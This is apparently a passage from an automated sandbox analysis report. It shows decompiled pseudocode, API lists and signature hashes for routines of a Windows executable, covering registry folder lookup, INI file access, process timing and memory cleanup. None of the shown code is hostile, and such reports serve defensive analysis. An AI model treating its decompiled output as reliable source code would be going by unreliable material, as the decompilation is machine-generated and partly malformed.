                                                                                                                                                      • Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DACC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E0040DACC(wchar_t* __ebx, void* __ecx) {
				void* _v8;
				char _v72;
				void _v590;
				long _v592;
				void* __esi;
				void* _t25;
				void* _t27;
				intOrPtr _t38;

				_t27 = __ecx;
				_t26 = __ebx;
				E0040DA9D();
				_t38 =  *0x413264; // 0x74a43bb0
				if(_t38 == 0) {
					_v592 = 0;
					memset( &_v590, 0, 0x206);
					_t3 =  &_v8; // 0x403a63
					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
						_t5 =  &_v8; // 0x403a63
						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72);
						RegCloseKey(_v8);
					}
					wcscpy(_t26,  &_v592);
					return 0 |  *_t26 != 0x00000000;
				}
				E004058FB();
				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
				return _t25;
			}











                                                                                                                                                      0x0040dacc
                                                                                                                                                      0x0040dacc
                                                                                                                                                      0x0040dad6
                                                                                                                                                      0x0040dadd
                                                                                                                                                      0x0040dae3
                                                                                                                                                      0x0040db04
                                                                                                                                                      0x0040db0b
                                                                                                                                                      0x0040db13
                                                                                                                                                      0x0040db2f
                                                                                                                                                      0x0040db36
                                                                                                                                                      0x0040db44
                                                                                                                                                      0x0040db4e
                                                                                                                                                      0x0040db54
                                                                                                                                                      0x0040db5d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040db69
                                                                                                                                                      0x0040dae5
                                                                                                                                                      0x0040daef
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                        • Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB5D
                                                                                                                                                        • Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
                                                                                                                                                      • API String ID: 2249099915-3068728944
                                                                                                                                                      • Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                      • Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
                                                                                                                                                      • Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                      • Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040BB15, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E0040BB15(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				struct HICON__* _t42;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t57;
				intOrPtr* _t59;
				void* _t60;

				_t59 =  *((intOrPtr*)(_t60 + 0xc));
				 *((intOrPtr*)(_t59 + 0x208)) = 0;
				 *((intOrPtr*)(_t59 + 0x244)) = 0;
				 *((intOrPtr*)(_t59 + 0x274)) = 0;
				 *((intOrPtr*)(_t59 + 0x240)) = 0;
				 *_t59 = 0x410438;
				_t35 = _t59 + 0x6ac;
				 *((intOrPtr*)(_t59 + 0x694)) = 0;
				_t50 = _t59 + 0x6c4;
				 *((intOrPtr*)(_t35 + 0xc)) = 0;
				 *_t35 = 0;
				 *((intOrPtr*)(_t35 + 4)) = 0;
				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
				 *((intOrPtr*)(_t35 + 8)) = 0;
				E0040133A(_t50);
				 *_t50 = 0x40f7b8;
				_t37 = E0040167A(_t50 + 0x40);
				 *((short*)(_t50 + 0x80)) = 0;
				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
				_push(0x2238);
				 *((intOrPtr*)(_t50 + 4)) = 0x72;
				 *((intOrPtr*)(_t50 + 0x74)) = 0;
				 *((intOrPtr*)(_t50 + 0x78)) = 0;
				L0040E038(); // executed
				if(_t37 == 0) {
					_t37 = 0;
					__eflags = 0;
				} else {
					 *((intOrPtr*)(_t37 + 0x14)) = 1;
					 *((short*)(_t37 + 0x18)) = 0;
					 *((short*)(_t37 + 0x228)) = 0;
					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
					 *0x412b14 = _t37;
				}
				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
				L0040E038();
				_t63 = _t37;
				_t48 = 0xc00;
				if(_t37 == 0) {
					_t38 = 0;
					__eflags = 0;
				} else {
					_t38 = E0040219B(_t37, _t63);
				}
				_t57 = _t59 + 0x27c;
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
				E00401000(_t59 + 0x492, _t48, 0x412054);
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x284)) = 0;
				 *((intOrPtr*)(_t59 + 0x280)) = 0;
				 *((intOrPtr*)(_t59 + 0x278)) = 0;
				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed
				E00401879(_t59, _t42);
				return _t59;
			}















                                                                                                                                                      0x0040bb19
                                                                                                                                                      0x0040bb1e
                                                                                                                                                      0x0040bb24
                                                                                                                                                      0x0040bb2a
                                                                                                                                                      0x0040bb30
                                                                                                                                                      0x0040bb36
                                                                                                                                                      0x0040bb3d
                                                                                                                                                      0x0040bb43
                                                                                                                                                      0x0040bb4a
                                                                                                                                                      0x0040bb52
                                                                                                                                                      0x0040bb55
                                                                                                                                                      0x0040bb57
                                                                                                                                                      0x0040bb5a
                                                                                                                                                      0x0040bb61
                                                                                                                                                      0x0040bb64
                                                                                                                                                      0x0040bb6c
                                                                                                                                                      0x0040bb72
                                                                                                                                                      0x0040bb7a
                                                                                                                                                      0x0040bb81
                                                                                                                                                      0x0040bb87
                                                                                                                                                      0x0040bb8d
                                                                                                                                                      0x0040bb93
                                                                                                                                                      0x0040bb98
                                                                                                                                                      0x0040bb9f
                                                                                                                                                      0x0040bba2
                                                                                                                                                      0x0040bba5
                                                                                                                                                      0x0040bbad
                                                                                                                                                      0x0040bbd6
                                                                                                                                                      0x0040bbd6
                                                                                                                                                      0x0040bbaf
                                                                                                                                                      0x0040bbaf
                                                                                                                                                      0x0040bbb2
                                                                                                                                                      0x0040bbb6
                                                                                                                                                      0x0040bbbd
                                                                                                                                                      0x0040bbc3
                                                                                                                                                      0x0040bbc9
                                                                                                                                                      0x0040bbcf
                                                                                                                                                      0x0040bbcf
                                                                                                                                                      0x0040bbdd
                                                                                                                                                      0x0040bbe3
                                                                                                                                                      0x0040bbe8
                                                                                                                                                      0x0040bbea
                                                                                                                                                      0x0040bbeb
                                                                                                                                                      0x0040bbf4
                                                                                                                                                      0x0040bbf4
                                                                                                                                                      0x0040bbed
                                                                                                                                                      0x0040bbed
                                                                                                                                                      0x0040bbed
                                                                                                                                                      0x0040bbf6
                                                                                                                                                      0x0040bbfc
                                                                                                                                                      0x0040bc09
                                                                                                                                                      0x0040bc0f
                                                                                                                                                      0x0040bc17
                                                                                                                                                      0x0040bc19
                                                                                                                                                      0x0040bc1f
                                                                                                                                                      0x0040bc25
                                                                                                                                                      0x0040bc2b
                                                                                                                                                      0x0040bc3a
                                                                                                                                                      0x0040bc43
                                                                                                                                                      0x0040bc4e

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C
                                                                                                                                                        • Part of subcall function 0040167A: memset.MSVCRT ref: 00401690
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
                                                                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0040BC3A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@memset$HandleIconLoadModule
                                                                                                                                                      • String ID: T A
                                                                                                                                                      • API String ID: 2596266805-11209434
                                                                                                                                                      • Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                      • Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
                                                                                                                                                      • Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
                                                                                                                                                      • Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D56B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 20%
                                                                                                                                                      			E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;
				long _t17;

				_t25 = __esi;
				E0040E340(0x20000, __ecx);
				if(_a4 == 0) {
					_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
					return _t17;
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040DFD6();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}





                                                                                                                                                      0x0040d56b
                                                                                                                                                      0x0040d573
                                                                                                                                                      0x0040d57c
                                                                                                                                                      0x0040d5e0
                                                                                                                                                      0x0040d5e7
                                                                                                                                                      0x0040d57e
                                                                                                                                                      0x0040d580
                                                                                                                                                      0x0040d5be
                                                                                                                                                      0x0040d590
                                                                                                                                                      0x0040d590
                                                                                                                                                      0x0040d598
                                                                                                                                                      0x0040d599
                                                                                                                                                      0x0040d5a4
                                                                                                                                                      0x0040d5a9
                                                                                                                                                      0x0040d5aa
                                                                                                                                                      0x0040d5b2
                                                                                                                                                      0x0040d5bb
                                                                                                                                                      0x0040d5bb
                                                                                                                                                      0x0040d5cf
                                                                                                                                                      0x0040d5cf

                                                                                                                                                      APIs
                                                                                                                                                      • wcschr.MSVCRT ref: 0040D585
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040D5AA
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                      • String ID: "%s"
                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                      • Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                      • Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
                                                                                                                                                      • Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
                                                                                                                                                      • Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040CE3D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x4136f4 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x4136f4 = 1;
						 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x4136f8 == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                                                      0x0040ce47
                                                                                                                                                      0x0040ce4e
                                                                                                                                                      0x0040ce56
                                                                                                                                                      0x0040ce5e
                                                                                                                                                      0x0040ce6e
                                                                                                                                                      0x0040ce6e
                                                                                                                                                      0x0040ce56
                                                                                                                                                      0x0040ce7a
                                                                                                                                                      0x0040ce92
                                                                                                                                                      0x0040ce7c
                                                                                                                                                      0x0040ce8b
                                                                                                                                                      0x0040ce8e
                                                                                                                                                      0x0040ce8e

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
                                                                                                                                                      • GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                                                                      • Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                      • Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
                                                                                                                                                      • Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
                                                                                                                                                      • Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004076F4, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E004076F4(intOrPtr* __edi) {
				void* __esi;
				void** _t11;
				intOrPtr* _t18;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t27 = __edi;
				 *__edi = 0x410168;
				E0040768E(__edi);
				_t31 =  *((intOrPtr*)(__edi + 0x14));
				if(_t31 != 0) {
					E00406355(_t31);
					_push(_t31);
					L0040E032();
				}
				_t32 =  *((intOrPtr*)(_t27 + 0x10));
				if(_t32 != 0) {
					E00406355(_t32);
					_push(_t32);
					L0040E032();
				}
				_t33 =  *((intOrPtr*)(_t27 + 0xc));
				if(_t33 != 0) {
					E00406355(_t33);
					_push(_t33);
					L0040E032();
				}
				_t34 =  *((intOrPtr*)(_t27 + 8));
				if(_t34 != 0) {
					E00406355(_t34);
					_push(_t34);
					L0040E032();
				}
				_t18 = _t27;
				_pop(_t35);
				_push(_t27);
				_t36 = _t18;
				_t28 = 0;
				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
						_t28 = _t28 + 1;
					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
				}
				_t11 =  *((intOrPtr*)( *_t36))();
				free( *_t11); // executed
				return _t11;
			}













                                                                                                                                                      0x004076f4
                                                                                                                                                      0x004076f7
                                                                                                                                                      0x004076fd
                                                                                                                                                      0x00407702
                                                                                                                                                      0x00407707
                                                                                                                                                      0x00407709
                                                                                                                                                      0x0040770e
                                                                                                                                                      0x0040770f
                                                                                                                                                      0x00407714
                                                                                                                                                      0x00407715
                                                                                                                                                      0x0040771a
                                                                                                                                                      0x0040771c
                                                                                                                                                      0x00407721
                                                                                                                                                      0x00407722
                                                                                                                                                      0x00407727
                                                                                                                                                      0x00407728
                                                                                                                                                      0x0040772d
                                                                                                                                                      0x0040772f
                                                                                                                                                      0x00407734
                                                                                                                                                      0x00407735
                                                                                                                                                      0x0040773a
                                                                                                                                                      0x0040773b
                                                                                                                                                      0x00407740
                                                                                                                                                      0x00407742
                                                                                                                                                      0x00407747
                                                                                                                                                      0x00407748
                                                                                                                                                      0x0040774d
                                                                                                                                                      0x0040774e
                                                                                                                                                      0x00407750
                                                                                                                                                      0x00407757
                                                                                                                                                      0x00407758
                                                                                                                                                      0x0040775a
                                                                                                                                                      0x0040775f
                                                                                                                                                      0x00407766
                                                                                                                                                      0x00407770
                                                                                                                                                      0x00407773
                                                                                                                                                      0x00407774
                                                                                                                                                      0x00407766
                                                                                                                                                      0x0040777d
                                                                                                                                                      0x00407781
                                                                                                                                                      0x00407789

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040770F
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407722
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407735
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407748
                                                                                                                                                      • free.MSVCRT(00000000), ref: 00407781
                                                                                                                                                        • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74784E00,?,00000000), ref: 0040635C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                      • Opcode ID: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
                                                                                                                                                      • Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
                                                                                                                                                      • Opcode Fuzzy Hash: fed31934c8ca2d006947c88f4fde5997effb1b6458a607f602b4779a4b9fefa7
                                                                                                                                                      • Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401DCF, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
				signed int _t23;
				signed short* _t24;
				void* _t27;
				signed short* _t32;

				_t23 = _a4;
				_t32 = _a8;
				 *_t32 =  *_t32 & 0x00000000;
				_t27 = 0xa;
				if(_t23 > _t27) {
					L12:
					_t24 = _t32;
					L13:
					return _t24;
				}
				switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {
					case 0:
						__eax = __ecx + 0x38;
						goto L15;
					case 1:
						__eax = __ecx + 0x30;
						L15:
						__eax = E00401D90(__eax, __esi); // executed
						goto L12;
					case 2:
						__ecx =  *((intOrPtr*)(__ecx + 0x10));
						goto L18;
					case 3:
						__ecx =  *((intOrPtr*)(__ecx + 0x14));
						goto L18;
					case 4:
						__ecx =  *((intOrPtr*)(__ecx + 0x18));
						goto L18;
					case 5:
						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
						L18:
						__eax = 0x412320;
						goto L3;
					case 6:
						__eflags =  *(__ecx + 0x40) & 0x00000001;
						goto L6;
					case 7:
						__eflags =  *(__ecx + 0x40) & 0x00002000;
						goto L6;
					case 8:
						__eflags =  *(__ecx + 0x40) & 0x00004000;
						L6:
						if(__eflags == 0) {
							_push(9);
							_pop(__ebx);
						}
						__eax = E00406827(__ebx);
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__ecx + 0x2c)));
						_push( *((intOrPtr*)(__ecx + 0x28)));
						_push(L"%I64d");
						_push(0xff);
						_push(__esi);
						L0040DFD6();
						__esp = __esp + 0x14;
						goto L12;
					case 0xa:
						_t30 =  *((intOrPtr*)(__ecx + 0x20));
						L3:
						_t24 = E00406306(0x412340, _t30);
						if(_t24 == 0) {
							_t24 = 0x40f454;
						}
						goto L13;
				}
			}







                                                                                                                                                      0x00401dd5
                                                                                                                                                      0x00401dda
                                                                                                                                                      0x00401ddd
                                                                                                                                                      0x00401de3
                                                                                                                                                      0x00401de6
                                                                                                                                                      0x00401e40
                                                                                                                                                      0x00401e40
                                                                                                                                                      0x00401e42
                                                                                                                                                      0x00401e47
                                                                                                                                                      0x00401e47
                                                                                                                                                      0x00401de8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e4a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e55
                                                                                                                                                      0x00401e4d
                                                                                                                                                      0x00401e4e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e64
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e69
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e6e
                                                                                                                                                      0x00401e5d
                                                                                                                                                      0x00401e5d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e07
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e1f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e17
                                                                                                                                                      0x00401e0b
                                                                                                                                                      0x00401e0b
                                                                                                                                                      0x00401e0d
                                                                                                                                                      0x00401e0f
                                                                                                                                                      0x00401e0f
                                                                                                                                                      0x00401e10
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e27
                                                                                                                                                      0x00401e2a
                                                                                                                                                      0x00401e2d
                                                                                                                                                      0x00401e32
                                                                                                                                                      0x00401e37
                                                                                                                                                      0x00401e38
                                                                                                                                                      0x00401e3d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401def
                                                                                                                                                      0x00401df7
                                                                                                                                                      0x00401df7
                                                                                                                                                      0x00401dfe
                                                                                                                                                      0x00401e00
                                                                                                                                                      0x00401e00
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                      • String ID: #A$%I64d$@#A
                                                                                                                                                      • API String ID: 3988819677-2754857024
                                                                                                                                                      • Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                      • Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
                                                                                                                                                      • Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
                                                                                                                                                      • Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040562D, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x40655f
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
